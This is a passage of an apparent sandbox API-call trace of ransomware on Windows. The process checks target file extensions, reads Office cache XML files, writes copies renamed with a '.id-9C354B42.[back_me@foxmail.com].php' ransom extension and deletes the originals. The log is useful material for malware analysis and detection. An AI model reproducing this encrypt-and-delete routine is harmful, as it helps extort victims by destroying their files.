lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString=".bz2") returned 4 [0036.644] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.644] lstrlenW (lpString=".7z") returned 3 [0036.644] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.644] lstrlenW (lpString=".dbf") returned 4 [0036.645] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.645] lstrlenW (lpString=".1cd") returned 4 [0036.645] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.645] lstrlenW (lpString=".jpg") returned 4 [0036.645] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.645] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0036.645] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0036.645] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0036.645] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=819) returned 1 [0036.645] CloseHandle (hObject=0x1e8) returned 1 [0036.645] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0036.645] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.645] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0036.645] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.646] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.646] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0036.646] GetLastError () returned 0x0 [0036.646] ReadFile (in: hFile=0x1e8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x333, lpOverlapped=0x0) returned 1 [0036.989] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x340, lpOverlapped=0x0) returned 1 [0037.557] ReadFile (in: hFile=0x1e8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.557] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0037.557] SetEndOfFile (hFile=0x1ec) returned 1 [0037.557] CloseHandle (hObject=0x1ec) returned 1 [0037.558] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.558] SetEndOfFile (hFile=0x1e8) returned 1 [0037.558] CloseHandle (hObject=0x1e8) returned 1 [0037.559] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.559] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0037.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.559] lstrlenW (lpString=".doc") returned 4 [0037.559] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.559] lstrlenW (lpString=".docx") returned 5 [0037.559] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.559] lstrlenW (lpString=".pdf") returned 4 [0037.559] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.559] lstrlenW (lpString=".xls") returned 4 [0037.559] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.559] lstrlenW (lpString=".xlsx") returned 5 [0037.559] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.559] lstrlenW (lpString=".ppt") returned 4 [0037.559] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.559] lstrlenW (lpString=".zip") returned 4 [0037.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.559] lstrlenW (lpString=".rar") returned 4 [0037.559] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.559] lstrlenW (lpString=".bz2") returned 4 [0037.560] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString=".7z") returned 3 [0037.560] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString=".dbf") returned 4 [0037.560] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString=".1cd") returned 4 [0037.560] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString=".jpg") returned 4 [0037.560] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString=".doc") returned 4 [0037.560] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString=".docx") returned 5 [0037.560] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.560] lstrlenW (lpString=".pdf") returned 4 [0037.560] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString=".xls") returned 4 [0037.560] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString=".xlsx") returned 5 [0037.560] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.560] lstrlenW (lpString=".ppt") returned 4 [0037.560] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.560] lstrlenW (lpString=".zip") returned 4 [0037.560] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.560] lstrlenW (lpString=".rar") returned 4 [0037.560] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.560] lstrlenW (lpString=".bz2") returned 4 [0037.560] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.561] lstrlenW (lpString=".7z") returned 3 [0037.561] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.561] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.561] lstrlenW (lpString=".dbf") returned 4 [0037.561] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.561] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.561] lstrlenW (lpString=".1cd") returned 4 [0037.561] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.561] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 79 [0037.561] lstrlenW (lpString=".jpg") returned 4 [0037.561] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.561] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.561] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0037.561] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.632] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=6421) returned 1 [0037.632] CloseHandle (hObject=0x1ec) returned 1 [0037.632] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0037.632] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.632] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.632] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.632] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.632] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0037.632] GetLastError () returned 0x0 [0037.632] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1915, lpOverlapped=0x0) returned 1 [0037.739] WriteFile (in: hFile=0x1ac, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0037.740] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.740] WriteFile (in: hFile=0x1ac, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.740] SetEndOfFile (hFile=0x1ac) returned 1 [0037.740] CloseHandle (hObject=0x1ac) returned 1 [0037.741] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.741] SetEndOfFile (hFile=0x1ec) returned 1 [0037.742] CloseHandle (hObject=0x1ec) returned 1 [0037.742] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.742] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0037.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.742] lstrlenW (lpString=".doc") returned 4 [0037.742] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.742] lstrlenW (lpString=".docx") returned 5 [0037.742] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.742] lstrlenW (lpString=".pdf") returned 4 [0037.742] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.742] lstrlenW (lpString=".xls") returned 4 [0037.742] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.742] lstrlenW (lpString=".xlsx") returned 5 [0037.742] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.743] lstrlenW (lpString=".ppt") returned 4 [0037.743] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString=".zip") returned 4 [0037.743] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.743] lstrlenW (lpString=".rar") returned 4 [0037.743] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString=".bz2") returned 4 [0037.743] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString=".7z") returned 3 [0037.743] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString=".dbf") returned 4 [0037.743] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString=".1cd") returned 4 [0037.743] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString=".jpg") returned 4 [0037.743] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.743] lstrlenW (lpString=".doc") returned 4 [0037.743] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString=".docx") returned 5 [0037.743] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.743] lstrlenW (lpString=".pdf") returned 4 [0037.743] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString=".xls") returned 4 [0037.743] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.743] lstrlenW (lpString=".xlsx") returned 5 [0037.744] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.744] lstrlenW (lpString=".ppt") returned 4 [0037.744] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.744] lstrlenW (lpString=".zip") returned 4 [0037.744] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.744] lstrlenW (lpString=".rar") returned 4 [0037.744] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.744] lstrlenW (lpString=".bz2") returned 4 [0037.744] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.744] lstrlenW (lpString=".7z") returned 3 [0037.744] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.744] lstrlenW (lpString=".dbf") returned 4 [0037.744] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.744] lstrlenW (lpString=".1cd") returned 4 [0037.744] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0037.744] lstrlenW (lpString=".jpg") returned 4 [0037.744] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.744] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.744] lstrlenW (lpString="Office32WW.xml") returned 14 [0037.744] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.745] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4274) returned 1 [0037.745] CloseHandle (hObject=0x1ec) returned 1 [0037.745] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0037.745] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.746] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.746] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.746] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.746] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0037.746] GetLastError () returned 0x0 [0037.746] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0037.883] WriteFile (in: hFile=0x1ac, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0037.884] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.884] WriteFile (in: hFile=0x1ac, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.884] SetEndOfFile (hFile=0x1ac) returned 1 [0037.884] CloseHandle (hObject=0x1ac) returned 1 [0037.885] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.885] SetEndOfFile (hFile=0x1ec) returned 1 [0037.886] CloseHandle (hObject=0x1ec) returned 1 [0037.886] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.886] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString=".doc") returned 4 [0037.887] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString=".docx") returned 5 [0037.887] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.887] lstrlenW (lpString=".pdf") returned 4 [0037.887] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString=".xls") returned 4 [0037.887] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString=".xlsx") returned 5 [0037.887] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.887] lstrlenW (lpString=".ppt") returned 4 [0037.887] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString=".zip") returned 4 [0037.887] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.887] lstrlenW (lpString=".rar") returned 4 [0037.887] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString=".bz2") returned 4 [0037.887] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString=".7z") returned 3 [0037.887] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString=".dbf") returned 4 [0037.887] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString=".1cd") returned 4 [0037.887] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.887] lstrlenW (lpString=".jpg") returned 4 [0037.887] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString=".doc") returned 4 [0037.888] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString=".docx") returned 5 [0037.888] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.888] lstrlenW (lpString=".pdf") returned 4 [0037.888] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString=".xls") returned 4 [0037.888] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString=".xlsx") returned 5 [0037.888] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.888] 